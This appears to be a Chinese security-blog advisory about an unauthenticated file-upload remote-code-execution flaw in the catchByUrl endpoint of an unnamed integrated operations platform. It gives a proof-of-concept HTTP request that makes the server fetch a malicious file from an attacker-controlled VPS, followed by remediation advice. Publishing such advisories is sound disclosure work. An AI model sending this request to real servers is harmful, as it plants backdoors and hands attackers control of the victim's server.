某科聚网一体化运营平台 catchByUrl 文件上传致RCE漏洞复现

0x01 产品简介

某科聚网一体化运营平台是一种综合性的软件平台,旨在帮助企业实现运营管理的集中化、自动化和协同化。该平台通常提供一系列功能模块和工具,用于支持企业在销售、营销、客户关系管理、供应链管理、人力资源管理等方面的运营活动。

0x02 漏洞概述

某科聚网一体化运营平台 catchByUrl接口存在文件上传漏洞,未经身份验证的攻击者可利用此漏洞上传后门文件,执行任意指令,从而获取服务器权限。

0x03 复现环境

0x04 漏洞复现

PoC

复制代码
GET /resources/files/ue/catchByUrl?url=http://vpsip/恶意文件 HTTP/1.1 
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
Connection: close

验证

0x05 修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本

相关推荐
骥龙12 小时前
1.2下、工欲善其事:物联网安全研究环境搭建指南
python·物联网·安全
逐梦苍穹12 小时前
不用公网 IP,把内网服务安全发布到公网:ZeroNews 快速上手
网络协议·tcp/ip·安全·内网穿透
网安CILLE13 小时前
PHP四大输出语句
linux·开发语言·python·web安全·网络安全·系统安全·php
xiatianxy13 小时前
云酷科技用智能化方案破解行业难题
人工智能·科技·安全·智能安全带
石像鬼₧魂石14 小时前
139/445 端口(Samba 服务)渗透测试全流程总结与复习
运维·安全·ssh
合才科技14 小时前
【要闻周报】网络安全与数据合规 1-12
安全·web安全
小五传输15 小时前
网闸怎么选?新型网闸凭安全高效,成企业优选方案
大数据·运维·安全
WLJT12312312315 小时前
电子元器件:智能时代的核心基石
大数据·人工智能·科技·安全·生活
信安成长日记16 小时前
CNI研究https://sanj.dev/post/cilium-calico-flannel-cni-performance-comparison
安全
小李独爱秋17 小时前
计算机网络经典问题透视:电子邮件的安全协议PGP主要都包含哪些措施?
运维·服务器·网络·网络协议·计算机网络·安全